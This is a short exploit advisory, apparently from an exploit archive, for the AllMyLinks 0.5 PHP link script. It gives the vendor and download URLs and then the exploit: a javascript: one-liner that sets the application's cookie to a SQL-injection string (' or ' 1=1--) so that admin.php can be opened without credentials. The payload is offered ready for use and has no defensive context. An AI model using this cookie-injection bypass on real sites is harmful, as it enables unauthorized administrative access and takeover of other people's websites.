id: 22293
date: 05/29/2014
title: AllMyLinks 0.5 Insecure Cookie Handling Vulnerability
author: JiKo
cves: 

----------[exploit Debut]
[Insecure Cookie Handling Vulnerability]
----------[Script Info]
 
Author	    : JIKO
 
----------[Script Info]
 
Site	    : http://www.voice-of-web.de/c-AllMyLinks-s37.html
Version     : 0.5.0
Download    : http://www.voice-of-web.de/media/downloads/AllMyPHP/AllMyLinks/AllMyLinks0.5.0.zip
 
----------[exploit Info]
 
Exploit :
http://Path/admin.php

 javascript:document.cookie="allmyphp_cookie=' or ' 1=1--;path=/";

----------[exploit Fin]

#  0day.today [2023-03-23]  #